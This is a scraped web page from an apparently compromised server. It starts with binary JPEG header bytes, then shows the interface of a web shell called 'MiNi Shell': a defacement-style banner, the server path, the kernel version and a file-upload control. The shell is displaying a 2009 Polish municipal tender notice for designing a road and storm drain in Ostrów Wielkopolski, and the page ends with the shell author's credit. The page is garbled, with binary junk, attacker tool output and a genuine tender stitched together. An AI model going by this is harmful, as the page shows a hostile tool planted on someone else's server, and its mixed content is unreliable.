JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090224/39016-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: Wykonanie projektu budowlanego - wykonawczego budowy ulicy Wylotowej 
w Ostrowie Wielkopolskim (od końca istniejącej nawierzchni bitumicznej do ul. Środkowej
- orientacyjna długość 2 000 m ) oraz projektu budowy kanału deszczowego</b><br>
<b>Numer ogłoszenia: 39016 - 2009; data zamieszczenia: 24.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Rejtana 54, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 7352576, faks 062 7352664.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzd.osw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego - wykonawczego budowy ulicy Wylotowej 
w Ostrowie Wielkopolskim (od końca istniejącej nawierzchni bitumicznej do ul. Środkowej
- orientacyjna długość 2 000 m ) oraz projektu budowy kanału deszczowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> -	Mapa do celów projektowania dróg,
-	Dokumentacja geodezyjna i kartograficzna związana z nabywaniem nieruchomości (projekty podziału nieruchomości).
- 	Dokumentacja formalno-prawna niezbędna w celu nabywania nieruchomości,
-	Dokumentacja formalno-prawna niezbędna do czasowego korzystania z nieruchomości,
-	Część ruchowa  -  projekt stałej organizacji ruchu,
	Raport o oddziaływaniu przedsięwzięcia na środowisko (uwzględniający budowę drogi, kanału deszczowego, sanitarnego, wodociągu i oświetlenia ulicznego)
-	Projekt budowlany (droga i kanał deszczowy),
-	Materiały projektowe do uzyskania opinii, uzgodnień i pozwoleń wymaganych przepisami szczególnymi, 
-	Projekt wykonawczy (droga i kanał deszczowy),
-	Dokumentacja przetargowa,
-	Kosztorys inwestorski,
-	Materiały do uzyskania decyzji środowiskowe (złożenie wniosku i uzyskanie decyzji)
-	Materiały do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej, z projektami podziału, (złożenie wniosku i uzyskanie decyzji),
-	Uzyskanie pozwolenia na budowę kanału deszczowego
-	Wyniki badań geotechnicznych (profile)
    
     Opracowanie projektowe należy wykonać w pasie drogowym wyznaczonym zgodnie z planem 
     zagospodarowania przestrzennego
     Jeżeli zaistnieje potrzeba poszerzenia pasa drogowego (w obrębie skrzyżowań) poza zatwierdzony plan, 
     opracowanie na ten zakres należy wykonać oddzielnie. Opracowanie to winno zawierać  wszystkie 
     elementy jak na zakres zasadniczy.


     Ustala się termin wykonania zamówienia:
     - uzyskanie decyzji o środowiskowych uwarunkowaniach na dzień - 31.07.2009 r.
     - uzyskanie  decyzji o zezwoleniu na realizację inwestycji drogowej i  pozwolenia na budowę 
       kanału deszczowego na dzień - 31.10.2009 r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24, ust 1 i 2,  
    spełniający warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień 
    publicznych, którzy:



-	Posiadają uprawnienia do wykonywania przedmiotowej działalności.
-	Posiadają niezbędną wiedzę i doświadczenie do realizacji robót wskazanych w opisie przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
            Wykonawca przystępujący do przetargu musi wykazać się zrealizowaniem (jako główny 
            wykonawca)  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, (a jeżeli  okres 
            prowadzenia działalności jest krótszy -  w tym okresie) 2 prac projektowych odpowiadających
            swoim rodzajem przedmiotowi zamówienia.  
-	Posiadają w dyspozycji  wykwalifikowany personel odpowiedzialny za prawidłowe wykonanie robót. 
-	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
-	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie dokumentów określonych w pkt. 7 SIWZ, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia  16.10.2008 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, SIWZ oraz ustawy - Prawo Zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7. l. Formularz oferty (na załączonym druku - załącznik nr 2)

7.2. Dane dotyczące sytuacji ekonomicznej i finansowej.     
1)	Aktualny odpis z właściwego rejestru  albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  Profil działania Wykonawcy musi odpowiadać przedmiotowi zamówienia.                  Odpis musi zawierać aktualny wykaz osób uprawnionych do reprezentowania wykonawcy.    
 
      Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast w/w dokumentów składa dokument lub dokumenty wystawione i obowiązujące w danym 
      kraju, potwierdzające odpowiednio że nie otwarto jego likwidacji ani nie ogłoszono upadłości, że nie 
      zalega z uiszczeniem podatków  opłat, składek na ubezpieczenie społeczne i zdrowotne albo że 
      uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
     wstrzymanie w całości  wykonania decyzji właściwego organu, że nie orzeczono wobec niego zakazu 
     ubiegania się o  zamówienie.                                   
.                              
2)	Oświadczenie w trybie Art. 22 ust. 1 ustawy, (druk w załączeniu - załącznik nr 4)
3)	Oświadczenie w trybie Art. 24 ust. 1  i  2 ustawy, (druk w załączeniu - załącznik nr 5)
4)   Pełnomocnictwo w oryginale do podpisania oferty. (Pełnomocnictwo nie jest wymagane jeżeli 
      podpisujący jest lub są właścicielami przedsiębiorstwa lub jeżeli są oni wymienieni z imienia i 
      nazwiska w odnośnym dokumencie rejestracyjnym)  
.      5)  Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca 
            nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem  
            zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  wstrzymanie w całości 
            wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
            przed upływem terminu składania ofert. 
       6)   Zaświadczenie z właściwego oddziału  Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
             Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na 
             ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem  
             zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  wstrzymanie w całości 
             wykonania decyzji  właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące 
             przed upływem terminu składania ofert.     

      Jeżeli wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej    
      zamiast dokumentów wymaganych w punktach 5 i 6 SIWZ wykonawca składa dokument lub 
     dokumenty wystawione i obowiązujące w danym  kraju, potwierdzające odpowiednio że nie otwarto 
      jego likwidacji ani nie ogłoszono upadłości, że nie zalega z uiszczeniem podatków  opłat, składek na 
     ubezpieczenie społeczne i zdrowotne albo że  uzyskał przewidziane prawem  zwolnienie, odroczenie 
     lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego 
     organu, że nie orzeczono wobec niego zakazu ubiegania się o  zamówienie.     
                            
7)	Oświadczenie finansowe, że oferent posiada środki finansowe do realizacji zamówienia.
      8)   Wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
             wykonaniu zamówienia z  udokumentowaniem ich doświadczenia i kwalifikacji zawodowych                 
       oraz poświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa)                
       (druk w załączeniu - załącznik nr 7)
9)  Wykaz zrealizowanych w ciągu ostatnich trzech lat zamówień odpowiadających swoim 
      rodzajem pracom projektowym odpowiadającym przedmiotowi zamówienia, z podaniem ich 
      wartości, daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że
      zamówienia te zostały wykonane należycie, (wymagane przedstawienie referencji) - załącznik nr 6)

7.3. Umowa spółki cywilnej jeżeli ofertę składa spółka cywilna, dokumenty rejestrowe wszystkich
 współwłaścicieli.

7.4. Wykaz - wskazanie części zamówienia, której wykonanie Wykonawca powierzy 
        podwykonawcom. 

7.5.   Projekt umowy zaakceptowany (podpisany) przez Wykonawcę lub umocowanego przedstawiciela 
   Wykonawcy (druk w załączeniu - załącznik nr 3)

7.6.   Oświadczenie o dokonaniu wizji lokalnej w terenie (w załączniku Oferta).

7.7 . Oświadczenie o ilości stron złożonej oferty (w załączniku Oferta).

7.8. Wykaz stron objętych tajemnicą handlową przedsiębiorstwa zgodnie z art. 8 ust. 3 ustawy 
       (w załączniku Oferta)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzd.osw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg, ul. Zamenhofa 2b, 63-400 Ostrów Wielkopolski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 09:30, miejsce: Miejski Zarząd Dróg, ul. Zamehofa 2b, 63 - 400 Ostrów Wielkopolski - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com